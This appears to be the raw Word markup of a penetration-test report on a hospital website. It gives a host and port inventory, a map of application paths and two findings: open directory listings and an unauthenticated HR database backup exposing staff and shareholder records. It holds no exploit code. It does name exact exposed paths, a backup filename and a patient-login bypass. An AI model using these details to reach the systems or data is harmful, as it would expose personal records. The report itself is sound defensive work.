        </w:tc>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Result</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 record</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199.188.201.16</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hostname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HTTP/2 200</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Content type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text/html</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Server header</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LiteSpeed</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Generator</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Mediroza CMS 1.4.2</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Author metadata</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Mediroza IT Department</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TLS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TLS 1.3 observed; hostname certificate behavior recorded in scan evidence</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MX</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mx1/mx2/mx3-hosting.jellyfish.systems</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SPF</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Includes +a, +mx, two hosting IPs and spf.web-hosting.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5.2 Public application map</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Path</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Observed role</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Security relevance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/index.html</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homepage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Application identity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/about.html</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content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Recon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/doctors.html</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content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Recon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/contact.html</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contact information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Recon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/patient/login.php</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 authentication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Critical attack surface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/staff/login.php</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Staff authentication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Restricted surface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/patient/portal.php</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Authenticated patient portal</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Reached after bypass</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/patient/download.php?id=n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 document retrieval</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Sensitive object access</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/old/</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Legacy/backup directory</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Directly exposed backup</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 directory listing</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File and endpoint enumeration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/staff/</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Staff directory listing</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Restricted endpoint enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5.3 robots.txt and sitemap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>robots.txt explicitly disallowed /patient/, /staff/ and /old/. This is not an access-control mechanism: the directories remained externally reachable and, in the observed cases, indexable. The sitemap contained public pages and omitted those restricted paths. The combination demonstrates why crawler directives should never be relied upon to protect sensitive resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>User-agent: *</w:t>
        <w:br/>
        <w:t>Disallow: /patient/</w:t>
        <w:br/>
        <w:t>Disallow: /staff/</w:t>
        <w:br/>
        <w:t>Disallow: /old/</w:t>
        <w:br/>
        <w:t xml:space="preserve">Sitemap: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:color w:val="232323"/>
            <w:sz w:val="16"/>
          </w:rPr>
          <w:t>https://medirozahospital.com/sitemap.xml</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:spacing w:before="0" w:after="120"/>
        <w:ind w:start="259" w:end="259"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="232323"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>5.4 Network service exposure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Port</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Observed service / behavior</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Treatment</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21</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Pure-FTPd</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Observed only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25</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SMTP</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Observed only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53</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BIND/DNS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Observed only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80</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HAProxy/openresty; direct-IP 403</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Observed only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110</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Dovecot POP3</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Observed only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143</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Dovecot IMAP</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Observed only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443</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HAProxy/openresty; TLS; direct-IP 403</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Primary web path by hostname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465</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SMTPS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Observed only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587</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Exim submission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Observed only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993</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IMAPS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Observed only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995</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POP3S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Observed only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2077</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cPanel/management redirect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Observed only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2091</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cPanel/management; unauthorized</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Observed only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Two full TCP scans differed: the first reported 13 open ports and the later repeat reported eight. The report retains that discrepancy because it is part of the evidence. Shared hosting, filtering and transient load-balancer behavior can change what is visible between scans. No unsupported conclusion is drawn from the difference.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-01 — Unauthenticated directory indexing on /old/, /patient/ and /staff/</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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FFEDD5"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D97706"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>HIGH</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7.5</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CWE-548</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Directory indexing converts a web root from a known application surface into a browsable file inventory. In this assessment, /old/, /patient/ and /staff/ exposed directory listings. The listing under /old/ was particularly consequential because it revealed a backup filename that could then be requested directly. The /patient/ listing exposed download.php, portal.php, login.php, logout.php and an error_log file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>An attacker does not need to guess endpoint names when the server supplies them. Enumeration reduces attack complexity and reveals legacy artifacts that are normally expected to be unreachable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/old/ directory listing exposed mediroza_db_backup_2019.sql.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/patient/ directory listing exposed reports/, download.php, error_log, login.php, logout.php and portal.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/staff/ directory listing exposed login.php.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>/patient/reports/ returned 403 when browsed directly.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="2491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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2491105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: /old/ directory listing and exposed backup filename.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="3002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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="3002915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: /patient/ directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5577840" cy="2985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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577840" cy="2985770"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: /staff/ directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Public enumeration of application files, logs, report paths and backup names.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In this assessment, /old/, /patient/ and /staff/ exposed directory listings. The listing under /old/ was particularly consequential because it revealed a backup filename that could then be requested directly. The /patient/ listing exposed download.php, portal.php, login.php, logout.php and an error_log file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Disable auto-indexing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>remove sensitive material from the web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>deny direct access to backup/archive/log extensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>deploy a default-deny rule for legacy directories</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>retest known and guessed filenames.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Retest criteria</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Unauthenticated requests to /old/, /patient/ and /staff/ must not return directory listings; known backup/log filenames must return 403/404.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext w:val="true"/>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>F-02 — Unauthenticated internal HR database backup exposure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CRITICALITY</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CVSS v3.1</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3408" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:fill="FEE2E2"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B91C1C"/>
                <w:kern w:val="0"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>CRITICAL</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9.4*</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CWE-552</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="40"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Technical description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The file mediroza_db_backup_2019.sql was directly retrievable from /old/. Its header identifies a Mediroza CMS 1.4.2 backup for the mediroza_hr database and explicitly warns that it contains confidential staff and shareholder records. The captured SQL contains 30 staff rows and 10 shareholder rows. Staff fields include full name, job title, department, email, phone, national ID, monthly salary and joining date. Shareholder fields include name, ownership percentage, shares held and share class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Why the evidence matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This is a direct unauthenticated disclosure of internal corporate and personal data. The finding is independent of the patient login SQL injection; an attacker can obtain the backup without first authenticating. The data is structured and immediately machine-readable, which materially increases its usefulness.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Confirmed evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Unauthenticated GET retrieved the SQL backup successfully.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Backup size: approximately 6.2 KB; 93 lines.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Staff table: 30 records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Shareholders table: 10 records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Exact monthly payroll derived from the captured salary values: ZAR 2,027,000.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Minimum salary: ZAR 19,000; maximum: ZAR 160,000; average: ZAR 67,566.67.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5669280" cy="3051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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5669280" cy="3051810"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="5A5A5A"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Evidence: browser-rendered internal SQL backup and confidentiality warning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Direct disclosure of 30 staff records and 10 shareholder records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Root cause / control failure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="259" w:before="0" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Its header identifies a Mediroza CMS 1.4.2 backup for the mediroza_hr database and explicitly warns that it contains confidential staff and shareholder records. The captured SQL contains 30 staff rows and 10 shareholder rows. Staff fields include full name, job title, department, email, phone, national ID, monthly salary and joining date. Shareholder fields include name, ownership percentage, shares held and share class.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="true"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Remove the backup from the public web root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>rotate or delete exposed copies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>block backup/archive extensions at the web-server layer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>store backups outside the document root</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>enforce authenticated, audited backup retrieval</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="60"/>
        <w:contextualSpacing/>
        <w:rPr/>
